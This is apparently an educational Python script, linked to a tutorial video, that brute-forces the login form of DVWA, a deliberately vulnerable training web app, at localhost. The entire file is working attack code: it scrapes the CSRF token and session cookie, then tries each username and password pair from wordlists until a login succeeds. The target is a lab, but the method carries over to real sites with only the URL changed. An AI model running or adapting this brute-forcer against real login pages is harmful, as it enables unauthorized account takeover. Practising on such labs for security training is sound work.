#!/usr/bin/python3

"""
Author: Leonardo Tamiano.

This script can be used to brute-force the initial login of DVWA.
Youtube video: https://www.youtube.com/watch?v=vvMGNbwIh_M.
"""

import requests
from bs4 import BeautifulSoup

URL = "http://localhost/login.php"
PASSWORD_WORDLIST = "./password_wordlist.txt"
USERNAME_WORDLIST = "./username_wordlist.txt"

proxies = {
    # "http": "http://127.0.0.1:8080"
}

def check_credentials(username, password):    
    # -- first request to get CSRF code and cookie value
    r1 = requests.get(URL, proxies=proxies)
    
    cookie = r1.headers["Set-Cookie"].split("PHPSESSID=")[1].split(";")[0]    
    soup = BeautifulSoup(r1.text, 'html.parser')
    csrf_token = soup.find("input", {"name": "user_token"})["value"]
    
    # -- second request to check creds    
    data = f"username={username}&password={password}&Login=Login&user_token={csrf_token}"
    
    custom_headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "Cookie": f"security=impossible; PHPSESSID={cookie}",
    }

    r2 = requests.post(URL, headers=custom_headers, data=data, proxies=proxies,
                       allow_redirects=False)

    # -- third request to follow redirect
    r3 = requests.get(URL, headers=custom_headers, proxies=proxies)
    
    if "Login failed" in r3.text:
        return False
    else:
        return True


def brute_force(username_wordlist, password_wordlist):
    # -- read wordlists files
    usernames = open(username_wordlist, "r").read().splitlines()
    passwords = open(password_wordlist, "r").read().splitlines()

    # -- for each user
    for user in usernames:
        # -- and for each password
        for password in passwords:
            # -- test (user, password)
            if check_credentials(user, password):
                print(f"Found credentials! ({user}:{password})")
                exit()    

if __name__ == "__main__":
    print(check_credentials("admin", "test"))
    brute_force(USERNAME_WORDLIST, PASSWORD_WORDLIST)
